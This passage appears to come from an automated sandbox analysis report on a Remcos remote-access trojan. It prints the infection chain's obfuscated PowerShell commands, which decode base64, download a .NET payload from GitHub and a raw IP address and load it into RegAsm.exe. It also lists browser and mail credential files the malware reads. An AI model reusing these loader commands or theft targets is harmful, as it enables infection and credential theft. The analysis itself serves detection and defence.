tttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu52okfquerbvefccgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vlnzcuyi='+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jfayasagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhreqtdflqzsagicagicagicagicagicagicagicagicagicagicagic1nrw1izxjerwzjtmluaw9oicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvste1vti5ktewilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbiemn3dexodyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmd2pwlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigzsv2necyx1aw50icagicagicagicagicagicagicagicagicagicagicagrhhgv2juvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicb0q2pitxpfeffcktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaiag1mwghpwgdnv1kiicagicagicagicagicagicagicagicagicagicagicaglw5htwvzugfjzsagicagicagicagicagicagicagicagicagicagicagie9ytxlnwuxfwxf2icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrqmmk6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaumjavotcvcgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vzc50suyilcikru5wokfquerbvefccgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vlnzcuyismcwwkttzvgfydc1zbgvfucgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu52okfquerbvefccgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vlnzcuyi='+[char]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgneycrjzinkyd9jysndscrj3jsjysniccrjz0gezb9ahr0chm6ly9yyxcuz2knkyd0jysnahunkydidxnlcmnvjysnbnrlbnquy28nkydtjysnl05vrgv0jysnzscrj2n0t24vticrj29ezxrlyycrj3rpbi8nkydyzscrj2ynkydzl2hlyscrj2rzl21hascrj24vrgv0yscrj2hob3rolvynkycudhh0ezb9oycrjyb7jysnmn1iyxnljysnnjrdb250zw50id0gke5ldy0nkydpymply3qnkycgu3lzjysndgvtlk4nkydljysndccrjy5xjysnzscrj2jdbgllbnqplkrvjysnd24nkydsb2enkydkjysnu3ryaw5nkhsyjysnfxunkydybcknkyc7ihsnkycyjysnfscrj2jpbmfyeunvbnrlbnqgpsbbjysnuycrj3knkydzdgvtjysnlknvjysnbicrj3ynkydlcnrdojpgcm8nkydtqmfzzty0u3qnkydyaw5nkhsnkycyjysnfwjhc2unkyc2nenvjysnbnqnkydlbnqpoyb7jysnmn1hc3nljysnbwjsesa9iftszscrj2zszwn0jysnaw9ujysnlkfzcycrj2vtymwnkyd5jysnxto6jysntg9hzch7mn1iaw5hcicrj3ldbycrj24nkyd0zw50ktsgwycrj2rujysnbglilklplkhvbwvdojpwqukoezf9jysndhh0licrj1ynkydwqkdgjysnuicrjy83jysnoscrjy8wmi4nkycwmicrjziumy4yjysnotevjysnlycrjzonkydwdhroezf9lccrjyb7jysnmx0nkydkzxnhdccrj2l2ywrvezenkyd9lcb7mx0nkydkjysnzxnhdgknkyd2jysnywrvezf9lcankyd7mscrj31kzxnhjysndgl2ywrveycrjzf9lccrjyankyd7mx1szwdbc217mx0sjysnihsxfxsxfsx7mx17mx0pjykgic1mw0niyxjdmzksw0niyxjdmzqsw0niyxjdmzypihwgjiggjevovjpdt21zuevdwzqsmjysmjvdluppsu4njyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/nodet'+'e'+'cton/n'+'odetec'+'ton/'+'re'+'f'+'s/hea'+'ds/mai'+'n/deta'+'hnoth-v'+'.txt{0};'+' {'+'2}base'+'64content = (new-'+'object'+' sys'+'tem.n'+'e'+'t'+'.w'+'e'+'bclient).do'+'wn'+'loa'+'d'+'string({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binarycontent = ['+'s'+'y'+'stem'+'.co'+'n'+'v'+'ert]::fro'+'mbase64st'+'ring({'+'2'+'}base'+'64co'+'nt'+'ent); {'+'2}asse'+'mbly = [re'+'flect'+'ion'+'.ass'+'embl'+'y'+']::'+'load({2}binar'+'yco'+'n'+'tent); ['+'dn'+'lib.io.home]::vai({1}'+'txt.'+'v'+'vbgf'+'r'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}regasm{1},'+' {1}{1},{1}{1})') -f[char]39,[char]34,[char]36) | &( $env:comspec[4,26,25]-join'')"
                    Source: RegAsm.exe, 00000010.00000002.849173368.0000000000800000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerll
                    Source: RegAsm.exe, 00000010.00000002.848958157.0000000000791000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerChromepment Doc's [Compatibility Mode]
                    Source: RegAsm.exe, 00000010.00000002.848958157.0000000000791000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: RegAsm.exe, 00000010.00000002.848958157.0000000000791000.00000004.00000020.00020000.00000000.sdmp, logs.dat.16.drBinary or memory string: [Program Manager]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_10002933 cpuid 16_2_10002933
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,33_2_0045201B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,33_2_004520B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,33_2_00452143
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,33_2_00452393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,33_2_00448484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,33_2_004524BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,33_2_004525C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,33_2_00452690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,33_2_0044896D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,33_2_0040F90C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,33_2_00451D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,33_2_00451FD0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,16_2_10002264
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,21_2_004082CD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,33_2_00449210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041739B GetVersionExW,20_2_0041739B
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 14.2.powershell.exe.1239d998.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.1239d998.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.849805315.000000000244E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.848958157.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.487528799.0000000000931000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.849173368.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.850008611.0000000003AC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.848958157.0000000000775000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.457736519.000000001239D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3864, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data33_2_0040BA4D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\33_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db33_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword21_2_004033F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword21_2_00402DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword21_2_00402DB3
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1628, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
                    Source: Yara matchFile source: 14.2.powershell.exe.1239d998.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.1239d998.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.849805315.000000000244E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.848958157.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.487528799.0000000000931000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.849173368.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
